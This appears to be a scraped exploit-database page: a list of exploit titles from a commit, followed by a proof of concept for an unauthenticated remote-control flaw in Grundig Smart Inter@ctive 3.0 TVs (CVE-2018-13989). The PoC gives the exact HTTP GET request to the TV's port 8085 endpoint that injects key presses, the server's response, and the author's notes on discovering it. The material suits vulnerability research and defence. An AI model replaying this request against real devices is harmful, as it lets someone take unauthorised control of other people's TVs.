b374aca9a3
10 changes to exploits/shellcodes G DATA Total Security 25.4.0.3 - Activex Buffer Overflow Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit) HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit) HID discoveryd - 'command_blink_on' Remote Code Execution (Metasploit) IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit) IBM QRadar SIEM - Remote Code Execution (Metasploit) Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit) Apache CouchDB - Arbitrary Command Execution (Metasploit) phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit) Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit) Dolibarr 3.2.0 < Alpha - File Inclusion Dolibarr ERP/CRM 3.2.0 < Alpha - File Inclusion Dolibarr ERP/CRM - OS Command Injection Dolibarr ERP/CRM < 3.2.0 / < 3.1.1 - OS Command Injection Dolibarr ERP/CMS 3.4.0 - 'exportcsv.php?sondage' SQL Injection Dolibarr ERP/CRM 3.4.0 - 'exportcsv.php?sondage' SQL Injection Dolibarr CMS 3.5.3 - Multiple Vulnerabilities Dolibarr ERP/CRM 3.5.3 - Multiple Vulnerabilities Dolibarr CMS 3.0 - Local File Inclusion / Cross-Site Scripting Dolibarr ERP/CRM 3.0 - Local File Inclusion / Cross-Site Scripting Dolibarr ERP/CRM - '/user/index.php' Multiple SQL Injections Dolibarr ERP/CRM - '/user/info.php?id' SQL Injection Dolibarr ERP/CRM - '/admin/boxes.php?rowid' SQL Injection Dolibarr ERP/CRM 3.1.0 - '/user/index.php' Multiple SQL Injections Dolibarr ERP/CRM 3.1.0 - '/user/info.php?id' SQL Injection Dolibarr ERP/CRM 3.1.0 - '/admin/boxes.php?rowid' SQL Injection Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection Dolibarr ERP/CRM 3.x - '/adherents/fiche.php' SQL Injection Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities Dolibarr 7.0.0 - SQL Injection Dolibarr ERP/CRM 7.0.0 - (Authenticated) SQL Injection Dolibarr ERP CRM < 7.0.3 - PHP Code Injection Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution WAGO e!DISPLAY 7300T - Multiple Vulnerabilities QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery
34 lines
No EOL
1.3 KiB
Text
34 lines
No EOL
1.3 KiB
Text
# Exploit Title: Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery
|
|
# Date: 2018-07-§3
|
|
# Exploit Author: Ahmethan-Gultekin - t4rkd3vilz
|
|
# Vendor Homepage: https://www.grundig.com/
|
|
# Software Link: https://play.google.com/store/apps/details?id=arcelik
|
|
# Version: Before > Smart Inter@ctive 3.0
|
|
# Tested on: Kali Linux
|
|
# CVE : CVE-2018-13989
|
|
|
|
# I'm trying my TV.I saw a Grundig remote control application on
|
|
# Google Play. Computer I downloaded and decompiled APK.
|
|
# And I began to examine individual classes. I noticed in a class
|
|
# that a request was sent during operations on the command line.
|
|
# I downloaded the phone packet viewer and opened the control application and
|
|
# made some operations. And I saw that there was such a request;
|
|
|
|
# PoC
|
|
|
|
request ->
|
|
GET /sendrcpackage?keyid=-2544&keysymbol=-4081 HTTP/1.1
|
|
Host: 192.168.1.106:8085
|
|
Connection : Keep-Alive
|
|
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
|
|
|
|
|
|
response ->
|
|
HTTP/1.1 200 OK
|
|
Content-Type : text/plain
|
|
|
|
# Set rc key is handled for key id : -2544 key symbol : -4081
|
|
# The only requirement for the connection between the TV and the application
|
|
# was to have the same IP address. After I made the IP address on the TV
|
|
# and the phone and the IP address on the computer the same:
|
|
# I accessed the interface from the 8085 port. Now I could do anything from the computer :) |